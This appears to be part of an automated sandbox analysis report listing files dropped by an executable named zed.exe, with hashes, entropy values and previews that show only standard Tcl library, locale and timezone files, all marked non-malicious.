                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3385
                                                                                                                                                                                                                                            Entropy (8bit):4.5164095151631125
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                                                                                                                            MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                                                                                                                            SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                                                                                                                            SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                                                                                                                            SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):319
                                                                                                                                                                                                                                            Entropy (8bit):5.167825099880243
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                                                                                                                            MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                                                                                                                            SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                                                                                                                            SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                                                                                                                            SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):780
                                                                                                                                                                                                                                            Entropy (8bit):4.716025632367214
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                                                                                                                            MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                                                                                                                            SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                                                                                                                            SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                                                                                                                            SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):347
                                                                                                                                                                                                                                            Entropy (8bit):5.062880051437783
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                                                                                                                            MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                                                                                                                            SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                                                                                                                            SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                                                                                                                            SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                                                                                            Entropy (8bit):5.124064818715749
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                                                                                                                            MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                                                                                                                            SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                                                                                                                            SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                                                                                                                            SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):33777
                                                                                                                                                                                                                                            Entropy (8bit):4.60013086740989
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                                                                                                                            MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                                                                                                                            SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                                                                                                                            SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                                                                                                                            SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):620
                                                                                                                                                                                                                                            Entropy (8bit):4.702477618616754
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                                                                                                                            MD5:07532085501876DCC6882567E014944C
                                                                                                                                                                                                                                            SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                                                                                                                            SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                                                                                                                            SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):23995
                                                                                                                                                                                                                                            Entropy (8bit):4.884828325514459
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                                                                                                                            MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                                                                                                                            SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                                                                                                                            SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                                                                                                                            SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):844
                                                                                                                                                                                                                                            Entropy (8bit):4.883013702569192
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                                                                                                                            MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                                                                                                                            SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                                                                                                                            SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                                                                                                                            SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42223
                                                                                                                                                                                                                                            Entropy (8bit):4.822635446297551
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                                                                                                                            MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                                                                                                                            SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                                                                                                                            SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                                                                                                                            SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5617
                                                                                                                                                                                                                                            Entropy (8bit):4.747404679682368
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                                                                                                                            MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                                                                                                                            SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                                                                                                                            SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                                                                                                                            SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12204
                                                                                                                                                                                                                                            Entropy (8bit):4.763796758810551
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                                                                                                                            MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                                                                                                                            SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                                                                                                                            SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                                                                                                                            SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):147
                                                                                                                                                                                                                                            Entropy (8bit):4.995501022397479
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2DcsBdNMXGm2OHnFvpsYoHsdSalHFLwy:SlSWB9eg/2DBpDm2OHnFvmYoH1alHOy
                                                                                                                                                                                                                                            MD5:FF8B5540631A6EE93507338C4E7AA49D
                                                                                                                                                                                                                                            SHA1:817B261A1B6B92AA498EC286349964EA10FB5A84
                                                                                                                                                                                                                                            SHA-256:7213997BB9CF9D384A7002B8C8EFEF25C01ABA6083D9835A16D583D5DCEE40A0
                                                                                                                                                                                                                                            SHA-512:8D78AC4868ED0013EDA536C0E82E0E91398772AA18C637AEFE22F24B142FCDA55A4CB853B2282951E907C9E2F62BD3F831A5CF995F52898F5225D16889943A9C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Abidjan) {.. {-9223372036854775808 -968 0 LMT}.. {-1830383032 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.832432925672155
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dc9XfBQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DUGDBS
                                                                                                                                                                                                                                            MD5:52FDFD3DB98475FBBB620D0D5565C5CC
                                                                                                                                                                                                                                            SHA1:C7750452859663605272553DBEE0B6C134E1517C
                                                                                                                                                                                                                                            SHA-256:6040827AFED8CEF45F252FBD7E3E862C0B5E9D06C1C98C58BAD61DFE67BD57CC
                                                                                                                                                                                                                                            SHA-512:2FF9D96D81279148A86BE208FEEACCBCB8B4224D093D6C092ECD1C4EA2186589CCF947027D3A726600C703611B4CFEE029AA14ED3E8593C477B427C4F342CF27
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Accra) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.817170256300069
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DczqIVDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DnaDkO
                                                                                                                                                                                                                                            MD5:30CDD4D37E9DD60FBF6D754C9343F364
                                                                                                                                                                                                                                            SHA1:56F896C21068764B7B8F884F374B18913CA3D9CA
                                                                                                                                                                                                                                            SHA-256:E11FD8AD8572B684333810CFDC23B92E1ACF619875866985E288D92F8277D07F
                                                                                                                                                                                                                                            SHA-512:78FC8043CCE25713404E70996229E5EA8238BF5C0F59029064EDA5494E2D4F54398931F3D855E30C82B2C53B789C40EE4CBF09D0F98C2BA6734595D4AA75017A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1080
                                                                                                                                                                                                                                            Entropy (8bit):4.187497782275587
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862D7nmdHh5Cv6/lHY8SOSuvvzXipFSgSO5vW5aKmvbsF6VWsXN87QBWcAFy:5veSvKlHYXNujXipFSjKRKXiWsXCGWJy
                                                                                                                                                                                                                                            MD5:E8D3DF11CE0E7575485573FA07D955D5
                                                                                                                                                                                                                                            SHA1:3B2C00C85B6C0BFAA1C676C970D6DF1B4BDC3D4A
                                                                                                                                                                                                                                            SHA-256:E6874647561CE1C5FD1F650C9B167F77AC5B24FD2026046399A9043CF998E5C4
                                                                                                                                                                                                                                            SHA-512:E2968BE847622CF243C0E498436FD21BDC2E1DF0FD8D694F2C70569D17CE896CDE4968BB8ABDEF9F687439E4EA2D955AE87D6C15E81F881EE1413416A90765D4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Algiers) {.. {-9223372036854775808 732 0 LMT}.. {-2486592732 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1531443600 0 0 WET}.. {-956365200 3600 1 WEST}.. {-950486400 0 0 WET}.. {-942012000 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796262400 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766630800 3600 0 CET}.. {-733280400 0 0 WET}.. {-439430400 3600 0 CET}.. {-212029200 0 0 WET}.. {41468400 3600 1 WEST}.. {54774000 0 0 WET}.. {231724800 3600 1 WEST}.. {246240000 3600 0 CET}.. {259545600 7200 1 CEST}.. {275274000 3600 0 CET}.. {309740400 0 0 WET}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.801054282631739
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjEUEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DGs+DR
                                                                                                                                                                                                                                            MD5:A543BDEB3771017421FB75231F0004F2
                                                                                                                                                                                                                                            SHA1:D682C58C27562FF3ABAB8EDE8EB6EA754DA7C02E
                                                                                                                                                                                                                                            SHA-256:064EB7F9A1FA05A317C6BDCA6B102BC1560D980758F9E4DDB010C9E7DC068ECB
                                                                                                                                                                                                                                            SHA-512:44848D60EDC79AF784A819714C0D9F62DCCB6329B47F25D74AB8C174BF9EC3F783C66FEB27F588A93FABA9BECAF076F453D6D797CE4F28461F7AE69440EA54C7
